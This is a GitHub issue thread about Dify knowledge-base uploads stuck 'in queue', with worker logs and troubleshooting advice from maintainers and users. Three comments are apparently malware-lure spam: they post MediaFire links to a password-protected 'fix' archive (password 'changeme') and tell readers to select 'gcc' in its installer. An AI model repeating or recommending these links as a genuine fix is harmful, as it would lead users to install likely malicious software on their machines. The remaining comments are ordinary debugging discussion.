### ISSUE TITLE
After uploading files in the knowledge base, the status is always in queue.

### ISSUE THREAD

**Issue by PsycheJ** [langgenius/dify#7747]
### Self Checks

- [X] This is only for bug report, if you would like to ask a question, please head to [Discussions](https://github.com/langgenius/dify/discussions/categories/general).
- [X] I have searched for existing issues [search for existing issues](https://github.com/langgenius/dify/issues), including closed ones.
- [X] I confirm that I am using English to submit this report (我已阅读并同意 [Language Policy](https://github.com/langgenius/dify/issues/1542)).
- [X] [FOR CHINESE USERS] 请务必使用英文提交 Issue，否则会被关闭。谢谢！:）
- [X] Please do not modify this template :) and fill in all the required fields.

### Dify version

0.7.0

### Cloud or Self Hosted

Self Hosted (Docker)

### Steps to reproduce

It was running normally before, but now it is suddenly unable to build an index. The docker log does not see any abnormal error reports, and all the corresponding docker services are started normally.
![QQ截图20240828143607](https://github.com/user-attachments/assets/1bf802d1-e7ca-414b-8bd8-e9b3c5c2bb8a)

### ✔️ Expected Behavior

How to check the problem?

**Comment by Evul88** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by crazywoola** [comment]
Please attach the contain logs.

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by tienldbnk** [comment]
metoo

**Comment by PsycheJ** [comment]
@crazywoola 我找了work的日志，没有错误

**Comment by PsycheJ** [comment]
@crazywoola 我看了work服务的日志，似乎没有报错

**Comment by PsycheJ** [comment]
worker-1  | worker: Warm shutdown (MainProcess)
worker-1  | Running migrations
worker-1  | None of PyTorch, TensorFlow >= 2.0, or Flax have been found. Models won't be available and only tokenizers, configuration and file/data utilities can be used.
worker-1  | Preparing database migration...
worker-1  | Start database migration.
worker-1  | INFO  [alembic.runtime.migration] Context impl PostgresqlImpl.
worker-1  | INFO  [alembic.runtime.migration] Will assume transactional DDL.
worker-1  | Database migration successful!
worker-1  | None of PyTorch, TensorFlow >= 2.0, or Flax have been found. Models won't be available and only tokenizers, configuration and file/data utilities can be used.
worker-1  | /app/api/.venv/lib/python3.10/site-packages/celery/platforms.py:829: SecurityWarning: You're running the worker with superuser privileges: this is
worker-1  | absolutely not recommended!
worker-1  | 
worker-1  | Please specify a different user using the --uid option.
worker-1  | 
worker-1  | User information: uid=0 euid=0 gid=0 egid=0
worker-1  | 
worker-1  |   warnings.warn(SecurityWarning(ROOT_DISCOURAGED.format(
worker-1  |  
worker-1  |  -------------- celery@d217d3763a91 v5.3.6 (emerald-rush)
worker-1  | --- ***** ----- 
worker-1  | -- ******* ---- Linux-5.15.0-116-generic-x86_64-with-glibc2.39 2024-08-28 07:49:45
worker-1  | - *** --- * --- 
worker-1  | - ** ---------- [config]
worker-1  | - ** ---------- .> app:         app:0x7fb66f97ab00
worker-1  | - ** ---------- .> transport:   redis://:**@redis:6379/1
worker-1  | - ** ---------- .> results:     postgresql://postgres:**@db:5432/dify
worker-1  | - *** --- * --- .> concurrency: 1 (gevent)
worker-1  | -- ******* ---- .> task events: OFF (enable -E to monitor tasks in this worker)
worker-1  | --- ***** ----- 
worker-1  |  -------------- [queues]
worker-1  |                 .> app_deletion     exchange=app_deletion(direct) key=app_deletion
worker-1  |                 .> dataset          exchange=dataset(direct) key=dataset
worker-1  |                 .> generation       exchange=generation(direct) key=generation
worker-1  |                 .> mail             exchange=mail(direct) key=mail
worker-1  |                 .> ops_trace        exchange=ops_trace(direct) key=ops_trace
worker-1  | 
worker-1  | [tasks]
worker-1  |   . schedule.clean_embedding_cache_task.clean_embedding_cache_task
worker-1  |   . schedule.clean_unused_datasets_task.clean_unused_datasets_task
worker-1  |   . tasks.add_document_to_index_task.add_document_to_index_task
worker-1  |   . tasks.annotation.add_annotation_to_index_task.add_annotation_to_index_task
worker-1  |   . tasks.annotation.batch_import_annotations_task.batch_import_annotations_task
worker-1  |   . tasks.annotation.delete_annotation_index_task.delete_annotation_index_task
worker-1  |   . tasks.annotation.disable_annotation_reply_task.disable_annotation_reply_task
worker-1  |   . tasks.annotation.enable_annotation_reply_task.enable_annotation_reply_task
worker-1  |   . tasks.annotation.update_annotation_to_index_task.update_annotation_to_index_task
worker-1  |   . tasks.batch_create_segment_to_index_task.batch_create_segment_to_index_task
worker-1  |   . tasks.clean_dataset_task.clean_dataset_task
worker-1  |   . tasks.clean_document_task.clean_document_task
worker-1  |   . tasks.clean_notion_document_task.clean_notion_document_task
worker-1  |   . tasks.deal_dataset_vector_index_task.deal_dataset_vector_index_task
worker-1  |   . tasks.delete_segment_from_index_task.delete_segment_from_index_task
worker-1  |   . tasks.disable_segment_from_index_task.disable_segment_from_index_task
worker-1  |   . tasks.document_indexing_sync_task.document_indexing_sync_task
worker-1  |   . tasks.document_indexing_task.document_indexing_task
worker-1  |   . tasks.document_indexing_update_task.document_indexing_update_task
worker-1  |   . tasks.duplicate_document_indexing_task.duplicate_document_indexing_task
worker-1  |   . tasks.enable_segment_to_index_task.enable_segment_to_index_task
worker-1  |   . tasks.mail_invite_member_task.send_invite_member_mail_task
worker-1  |   . tasks.mail_reset_password_task.send_reset_password_mail_task
worker-1  |   . tasks.ops_trace_task.process_trace_tasks
worker-1  |   . tasks.recover_document_indexing_task.recover_document_indexing_task
worker-1  |   . tasks.remove_app_and_related_data_task.remove_app_and_related_data_task
worker-1  |   . tasks.remove_document_from_index_task.remove_document_from_index_task
worker-1  |   . tasks.retry_document_indexing_task.retry_document_indexing_task
worker-1  |   . tasks.sync_website_document_indexing_task.sync_website_document_indexing_task
worker-1  | 
worker-1  | [2024-08-28 07:49:45,427: INFO/MainProcess] Connected to redis://:**@redis:6379/1
worker-1  | [2024-08-28 07:49:45,436: INFO/MainProcess] mingle: searching for neighbors
worker-1  | [2024-08-28 07:49:46,469: INFO/MainProcess] mingle: all alone
worker-1  | [2024-08-28 07:49:46,518: INFO/MainProcess] celery@d217d3763a91 ready.
worker-1  | [2024-08-28 07:49:46,523: INFO/MainProcess] pidbox: Connected to redis://:**@redis:6379/1.
worker-1  | [2024-08-28 07:49:46,529: INFO/MainProcess] Task tasks.clean_dataset_task.clean_dataset_task[26c7c8f4-0135-4fa6-8bbf-2691b4f98c40] received
worker-1  | [2024-08-28 07:49:46,531: INFO/MainProcess] Start clean dataset when dataset deleted: a7e90578-d5dd-4343-bc94-a2d9d3f2ad59
worker-1  | [2024-08-28 07:49:46,855: INFO/MainProcess] Cleaning documents for dataset: a7e90578-d5dd-4343-bc94-a2d9d3f2ad59
worker-1  | [2024-08-28 07:49:46,916: INFO/MainProcess] Task tasks.document_indexing_task.document_indexing_task[bda0893b-8c5f-4dba-bce3-71552ce38219] received        @crazywoola I looked at the work service and didn&#39;t seem to make a mistake.

**Comment by PsycheJ** [comment]
@crazywoola I looked at the work service and didn't seem to make a mistake.

**Comment by crazywoola** [comment]
I think you can restart the containers to see if this persists.

**Comment by AAEE86** [comment]
You should check if the models you are using is accessible.

**Comment by Chunk0423** [comment]
I have the same problem. I've check the logs.
It seems that redis has some problems.
Temporary failure in name resolution

**Comment by PsycheJ** [comment]
> I have the same problem. I've check the logs. It seems that redis has some problems. Temporary failure in name resolution

redis?How did you solve it?

**Comment by xuqingwei001** [comment]
![image](https://github.com/user-attachments/assets/513d1855-1321-4be4-85ce-ea9b3d8fc2d8)
Error: Can't locate revision identified by 'd0187d6a88dd'，How to solve it

**Comment by AcacioAraujo** [comment]
> ![image](https://private-user-images.githubusercontent.com/96721649/363936856-513d1855-1321-4be4-85ce-ea9b3d8fc2d8.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3Mjk1MTMxOTMsIm5iZiI6MTcyOTUxMjg5MywicGF0aCI6Ii85NjcyMTY0OS8zNjM5MzY4NTYtNTEzZDE4NTUtMTMyMS00YmU0LTg1Y2UtZWE5YjNkOGZjMmQ4LnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDEwMjElMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQxMDIxVDEyMTQ1M1omWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTcxZjE2Y2EyMWQ4Mjg3YjFlZDQ0YTM2NzBiZGZjMTM2ZTliNmE5NzZlNzAzODc0YmVjYjA4OWY5MGUzNWE4ODkmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0In0.H1IJhrfAHBN3glZubCUykbMjD1pu6Usds4DtBJaz1tk) Error: Can't locate revision identified by 'd0187d6a88dd'，How to solve it

Same here. Did you solve it?

**Comment by crazywoola** [comment]
> > I think you can restart the containers to see if this persists.我认为您可以重新启动容器，看看这种情况是否仍然存在。
> 
> When using QA generation, due to the long time, it is easy to get stuck in the queue, but I don't want to restart. Restarting can indeed solve this problem. Can we fundamentally solve it without causing the service to crash even if it times out

I don't think so, for a long running job, either you can remove it if it's stale or you can restart it. There is no way to resume that during the process.
